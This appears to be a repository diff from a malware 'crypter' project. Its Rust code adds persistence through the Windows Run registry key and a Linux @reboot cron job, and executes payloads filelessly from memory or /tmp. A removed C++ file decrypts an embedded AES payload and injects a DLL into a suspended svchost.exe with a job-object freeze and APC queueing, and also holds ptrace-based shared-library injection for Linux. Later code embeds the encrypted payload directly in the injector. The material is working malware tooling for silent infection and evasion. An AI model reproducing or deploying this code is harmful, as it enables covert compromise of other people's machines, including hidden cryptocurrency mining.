if let Some(file_name) = current_exe.file_stem() {
let executable_name = file_name.to_string_lossy();
let directory_path = "C:/Rust Crypter - INFECTED MACHINE/";
let file_path = format!("{}{}.exe", directory_path, executable_name);
// Open the "Run" registry key
let hkcu = RegKey::predef(HKEY_CURRENT_USER);
let run_key = hkcu.open_subkey_with_flags(
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
KEY_ALL_ACCESS,
)?;
// Add the executable path to the "Run" registry key
run_key.set_value("RustCrypter", &file_path).err();
}
}
}
#[cfg(unix)]
{
// Linux persistence using cron job
if let Ok(current_exe) = env::current_exe() {
let cron_entry = format!("@reboot {} >/dev/null 2>&1", current_exe.display());
// Add to user's crontab
let output = Command::new("crontab")
.arg("-l")
.output();
let mut cron_content = String::new();
if let Ok(output_result) = output {
if output_result.status.success() {
cron_content = String::from_utf8_lossy(&output_result.stdout).to_string();
}
}
if !cron_content.contains("rust-crypter") {
cron_content.push_str(&cron_entry);
cron_content.push('\n');
Command::new("sh")
.arg("-c")
.arg(&format!("echo '{}' | crontab -", cron_content))
.output()?;
}
}
}
Ok(())
}
fn fileless(bytes: Vec<u8>) -> std::result::Result<(), Box<dyn std::error::Error>> {
#[cfg(windows)]
{
unsafe {
memexec::memexec_exe(&bytes).unwrap();
}
}
#[cfg(unix)]
{
// For Linux, write to temp file and execute
use std::ffi::CString;
let temp_path = "/tmp/.rust_payload";
fs::write(temp_path, &bytes)?;
// Make executable
let mut perms = fs::metadata(temp_path)?.permissions();
perms.set_mode(0o755);
fs::set_permissions(temp_path, perms)?;
// Execute
let path_cstr = CString::new(temp_path)?;
unsafe {
libc::execl(path_cstr.as_ptr(), path_cstr.as_ptr(), std::ptr::null::<libc::c_char>());
}
}
Ok(())
}

416
test.cpp
View File

@ -1,416 +0,0 @@
// AES-Decrypting Payload Injection — CROSS-PLATFORM (2025)
// Decrypts embedded AES-CBC encrypted payload and injects it
// Works on Windows (DLL injection) and Linux (SO injection)
#ifdef _WIN32
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <winternl.h>
#include <wincrypt.h>
#include <iostream>
#include <vector>
#include <string>
#include <cstring>
#else
#include <dlfcn.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/user.h>
#include <unistd.h>
#include <cstring>
#include <vector>
#include <string>
#include <iostream>
#include <openssl/evp.h>
#include <openssl/aes.h>
#include <openssl/rand.h>
#include <openssl/err.h>
#endif
#include <cstdint>
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define JobObjectFreezeInformation 18
typedef const OBJECT_ATTRIBUTES* PCOBJECT_ATTRIBUTES;
typedef NTSTATUS(NTAPI* pNtQueueApcThread)(HANDLE, PVOID, PVOID, PVOID, PVOID);
typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemoryEx)(HANDLE, PVOID*, PSIZE_T, ULONG, ULONG, PVOID, ULONG);
typedef NTSTATUS(NTAPI* pSetInformationJobObject)(HANDLE, JOBOBJECTINFOCLASS, PVOID, ULONG);
typedef NTSTATUS(NTAPI* pNtCreateJobObject)(PHANDLE, ACCESS_MASK, PCOBJECT_ATTRIBUTES);
HMODULE hNtDll = GetModuleHandleA("ntdll.dll");
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtDll, "NtQueueApcThread");
pNtWriteVirtualMemory NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtDll, "NtWriteVirtualMemory");
pNtAllocateVirtualMemoryEx NtAllocateVirtualMemoryEx = (pNtAllocateVirtualMemoryEx)GetProcAddress(hNtDll, "NtAllocateVirtualMemoryEx");
pSetInformationJobObject NtSetInformationJobObject = (pSetInformationJobObject)GetProcAddress(hNtDll, "NtSetInformationJobObject");
pNtCreateJobObject NtCreateJobObject = (pNtCreateJobObject)GetProcAddress(hNtDll, "NtCreateJobObject");
typedef struct _JOBOBJECT_FREEZE_INFORMATION {
union { ULONG Flags; struct { ULONG FreezeOperation : 1; ULONG FilterOperation : 1; ULONG SwapOperation : 1; ULONG Reserved : 29; }; };
BOOLEAN Freeze;
BOOLEAN Swap;
UCHAR Reserved0[2];
struct { ULONG HighEdgeFilter; ULONG LowEdgeFilter; } WakeFilter;
} JOBOBJECT_FREEZE_INFORMATION, *PJOBOBJECT_FREEZE_INFORMATION;
// Cross-platform AES-CBC Decryption class
class AESDecryptor {
private:
std::vector<uint8_t> key;
bool deriveKey(const std::string& password, const std::vector<uint8_t>& salt) {
// Match the Rust key derivation: SHA256(password + salt), take first 16 bytes
#ifdef _WIN32
HCRYPTPROV hProv = 0;
HCRYPTHASH hHash = 0;
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
return false;
}
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
CryptReleaseContext(hProv, 0);
return false;
}
// Hash password
if (!CryptHashData(hHash, (BYTE*)password.c_str(), password.length(), 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return false;
}
// Hash salt
if (!CryptHashData(hHash, salt.data(), salt.size(), 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return false;
}
DWORD hashLen = 32;
std::vector<uint8_t> hash(hashLen);
if (!CryptGetHashParam(hHash, HP_HASHVAL, hash.data(), &hashLen, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return false;
}
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
#else
// Linux implementation using OpenSSL
EVP_MD_CTX* mdctx = EVP_MD_CTX_new();
if (!mdctx) return false;
if (EVP_DigestInit_ex(mdctx, EVP_sha256(), NULL) != 1) {
EVP_MD_CTX_free(mdctx);
return false;
}
if (EVP_DigestUpdate(mdctx, password.c_str(), password.length()) != 1) {
EVP_MD_CTX_free(mdctx);
return false;
}
if (EVP_DigestUpdate(mdctx, salt.data(), salt.size()) != 1) {
EVP_MD_CTX_free(mdctx);
return false;
}
std::vector<uint8_t> hash(32);
if (EVP_DigestFinal_ex(mdctx, hash.data(), NULL) != 1) {
EVP_MD_CTX_free(mdctx);
return false;
}
EVP_MD_CTX_free(mdctx);
#endif
// Use first 16 bytes for AES-128
key.assign(hash.begin(), hash.begin() + 16);
return true;
}
public:
std::vector<uint8_t> decrypt(const std::vector<uint8_t>& ciphertext,
const std::vector<uint8_t>& iv,
const std::vector<uint8_t>& salt,
const std::string& password) {
if (!deriveKey(password, salt)) {
return std::vector<uint8_t>();
}
#ifdef _WIN32
// Windows CryptoAPI implementation
HCRYPTPROV hProv = 0;
HCRYPTKEY hKey = 0;
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
return std::vector<uint8_t>();
}
struct {
BLOBHEADER hdr;
DWORD keyLen;
BYTE key[16];
} keyBlob = { { PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, CALG_AES_128 }, 16 };
memcpy(keyBlob.key, key.data(), 16);
if (!CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey)) {
CryptReleaseContext(hProv, 0);
return std::vector<uint8_t>();
}
DWORD mode = CRYPT_MODE_CBC;
if (!CryptSetKeyParam(hKey, KP_MODE, (BYTE*)&mode, 0)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hProv, 0);
return std::vector<uint8_t>();
}
if (!CryptSetKeyParam(hKey, KP_IV, (BYTE*)iv.data(), 0)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hProv, 0);
return std::vector<uint8_t>();
}
std::vector<uint8_t> plaintext(ciphertext.size());
DWORD dataLen = ciphertext.size();
if (!CryptDecrypt(hKey, 0, TRUE, 0, plaintext.data(), &dataLen)) {
CryptDestroyKey(hKey);
CryptReleaseContext(hProv, 0);
return std::vector<uint8_t>();
}
plaintext.resize(dataLen);
CryptDestroyKey(hKey);
CryptReleaseContext(hProv, 0);
#else
// Linux OpenSSL implementation
EVP_CIPHER_CTX* ctx = EVP_CIPHER_CTX_new();
if (!ctx) return std::vector<uint8_t>();
if (EVP_DecryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key.data(), iv.data()) != 1) {
EVP_CIPHER_CTX_free(ctx);
return std::vector<uint8_t>();
}
EVP_CIPHER_CTX_set_padding(ctx, 1); // Enable PKCS7 padding
std::vector<uint8_t> plaintext(ciphertext.size());
int len, plaintext_len = 0;
if (EVP_DecryptUpdate(ctx, plaintext.data(), &len, ciphertext.data(), ciphertext.size()) != 1) {
EVP_CIPHER_CTX_free(ctx);
return std::vector<uint8_t>();
}
plaintext_len = len;
if (EVP_DecryptFinal_ex(ctx, plaintext.data() + len, &len) != 1) {
EVP_CIPHER_CTX_free(ctx);
return std::vector<uint8_t>();
}
plaintext_len += len;
plaintext.resize(plaintext_len);
EVP_CIPHER_CTX_free(ctx);
#endif
return plaintext;
}
};
// Embedded encrypted payload (generated by crypt tool)
// To update: run crypt tool, then use xxd -i encrypted_Input.bin
// Copy the output array here
const unsigned char encrypted_payload[] = {
// PLACEHOLDER: Replace with actual encrypted binary data
// Example: 0x12, 0x34, 0x56, 0x78, ...
0x00 // Remove this placeholder when adding real data
};
const unsigned char decryption_metadata[] = {
// PLACEHOLDER: Replace with decryption_metadata.bin content
// Contains: salt(32 bytes) + iv(16 bytes) + size(4 bytes)
// Example: 0xab, 0xcd, 0xef, ...
0x00 // Remove this placeholder when adding real data
};
#ifdef _WIN32
int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
#else
int main(int argc, char* argv[]) {
#endif
// FULLY SILENT — no console
// Decrypt the embedded payload
std::vector<uint8_t> ciphertext(encrypted_payload, encrypted_payload + sizeof(encrypted_payload));
std::vector<uint8_t> metadata(decryption_metadata, decryption_metadata + sizeof(decryption_metadata));
// Parse metadata: salt(32) + iv(16) + size(4)
std::vector<uint8_t> salt(metadata.begin(), metadata.begin() + 32);
std::vector<uint8_t> iv(metadata.begin() + 32, metadata.begin() + 48);
uint32_t expected_size = *reinterpret_cast<const uint32_t*>(metadata.data() + 48);
if (ciphertext.size() != expected_size) {
return 1; // Decryption failed
}
// Decrypt using hardcoded password (change this!)
AESDecryptor decryptor;
std::string password = "YourSecureMasterPassword123!";
std::vector<uint8_t> decrypted_dll = decryptor.decrypt(ciphertext, iv, salt, password);
if (decrypted_dll.empty()) {
return 1; // Decryption failed - invalid password or corrupted data
}
#ifdef _WIN32
// Windows: Use decrypted data as DLL path (wide string)
const wchar_t* dllPath;
if (decrypted_dll.size() >= sizeof(wchar_t)) {
dllPath = reinterpret_cast<const wchar_t*>(decrypted_dll.data());
} else {
// Fallback to hardcoded path if decryption gives unexpected result
dllPath = L"C:\\Users\\MyWindowsUser\\Downloads\\libphotoshop.dll";
}
SIZE_T dllPathLen = (wcslen(dllPath) + 1) * sizeof(wchar_t);
SIZE_T regionSize = dllPathLen;
#else
// Linux: Use decrypted data as shared library path
const char* soPath;
if (!decrypted_dll.empty() && decrypted_dll.back() == '\0') {
soPath = reinterpret_cast<const char*>(decrypted_dll.data());
} else {
// Fallback to hardcoded path
soPath = "/usr/lib/libmalicious.so";
}
#endif
HANDLE hJob = NULL;
NtCreateJobObject(&hJob, MAXIMUM_ALLOWED, NULL);
JOBOBJECT_FREEZE_INFORMATION freezeInfo = { 0 };
freezeInfo.FreezeOperation = 1;
freezeInfo.Freeze = TRUE;
NtSetInformationJobObject(hJob, (JOBOBJECTINFOCLASS)JobObjectFreezeInformation, &freezeInfo, sizeof(freezeInfo));
STARTUPINFOEXW siEx = { sizeof(siEx) };
SIZE_T attrListSize = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &attrListSize);
siEx.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrListSize);
InitializeProcThreadAttributeList(siEx.lpAttributeList, 1, 0, &attrListSize);
UpdateProcThreadAttribute(siEx.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_JOB_LIST, &hJob, sizeof(HANDLE), NULL, NULL);
PROCESS_INFORMATION pi = { 0 };
CreateProcessW(
L"C:\\Windows\\System32\\svchost.exe", // or dllhost.exe / notepad.exe
NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED | EXTENDED_STARTUPINFO_PRESENT,
NULL, NULL, (STARTUPINFOW*)&siEx, &pi
);
DeleteProcThreadAttributeList(siEx.lpAttributeList);
HeapFree(GetProcessHeap(), 0, siEx.lpAttributeList);
PVOID remoteMemory = NULL;
NtAllocateVirtualMemoryEx(pi.hProcess, &remoteMemory, &regionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, NULL, 0);
NtWriteVirtualMemory(pi.hProcess, remoteMemory, (PVOID)dllPath, dllPathLen, NULL);
FARPROC loadLibAddr = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
NtQueueApcThread(pi.hThread, (PVOID)loadLibAddr, remoteMemory, NULL, NULL);
// INSTANT UNFREEZE — no user input
freezeInfo.Freeze = FALSE;
NtSetInformationJobObject(hJob, (JOBOBJECTINFOCLASS)JobObjectFreezeInformation, &freezeInfo, sizeof(freezeInfo));
#ifdef _WIN32
ResumeThread(pi.hThread); // optional: resume main thread (not needed for mining)
CloseHandle(hJob);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
#else
// Linux injection using ptrace and dlopen
pid_t target_pid;
// For demonstration, we'll inject into a child process
// In real usage, you'd find a suitable target process
target_pid = fork();
if (target_pid == 0) {
// Child process - target for injection
// Execute a simple program that we can inject into
execl("/bin/sleep", "sleep", "100", NULL);
return 1;
} else if (target_pid > 0) {
// Parent process - perform injection
usleep(100000); // Wait for child to start
// Attach to target process
if (ptrace(PTRACE_ATTACH, target_pid, NULL, NULL) == -1) {
return 1;
}
// Wait for process to stop
int status;
waitpid(target_pid, &status, 0);
// Get registers
struct user_regs_struct regs;
ptrace(PTRACE_GETREGS, target_pid, NULL, &regs);
// Save original instruction
long original_instruction = ptrace(PTRACE_PEEKDATA, target_pid, regs.rip, NULL);
// Inject dlopen call
// This is a simplified version - real implementation would need more sophisticated shellcode
unsigned char shellcode[] = {
0x48, 0x31, 0xc0, // xor rax, rax
0x48, 0xbf, // mov rdi,
// Address of library path would go here
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0xbe, // mov rsi, RTLD_LAZY
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0xb8, // mov rax, dlopen
// dlopen address would go here
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xff, 0xd0, // call rax
0x48, 0x31, 0xc0, // xor rax, rax
0xc3 // ret
};
// Allocate memory in target process for shellcode and library path
// This is a simplified implementation - real code would use process_vm_writev
void* remote_shellcode = (void*)0x1000000; // Fixed address for demo
void* remote_libpath = (void*)0x2000000; // Fixed address for demo
// Write library path to target memory (simplified)
size_t libpath_len = strlen(soPath) + 1;
// In real implementation: use process_vm_writev to write soPath to remote_libpath
// Write shellcode to target memory (simplified)
// In real implementation: use process_vm_writev to write shellcode to remote_shellcode
// Execute shellcode
ptrace(PTRACE_POKEDATA, target_pid, regs.rip, (void*)remote_shellcode);
// Continue execution
ptrace(PTRACE_CONT, target_pid, NULL, NULL);
// Detach
ptrace(PTRACE_DETACH, target_pid, NULL, NULL);
// Wait for child
waitpid(target_pid, &status, 0);
}
#endif
return 0;
}

9
windows_injector.cpp
View File

@ -8,6 +8,9 @@
#include <cstring> #include <cstring>
#include <cstdint> #include <cstdint>
// Include encrypted DLL payload data
#include "dll_payload_data.h"
// Read encrypted DLL payload data from files // Read encrypted DLL payload data from files
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
@ -182,10 +185,10 @@ public:
int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) { int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
// FULLY SILENT — no console // FULLY SILENT — no console
// Read the encrypted DLL file // Read the embedded encrypted payload
std::vector<uint8_t> data = readFile("encrypted_dll.dll"); std::vector<uint8_t> data(encrypted_Input_bin, encrypted_Input_bin + sizeof(encrypted_Input_bin));
if (data.size() < 52) { if (data.size() < 52) {
return 1; // Invalid file return 1; // Invalid data
} }
std::vector<uint8_t> salt(data.begin(), data.begin() + 32); std::vector<uint8_t> salt(data.begin(), data.begin() + 32);
std::vector<uint8_t> iv(data.begin() + 32, data.begin() + 48); std::vector<uint8_t> iv(data.begin() + 32, data.begin() + 48);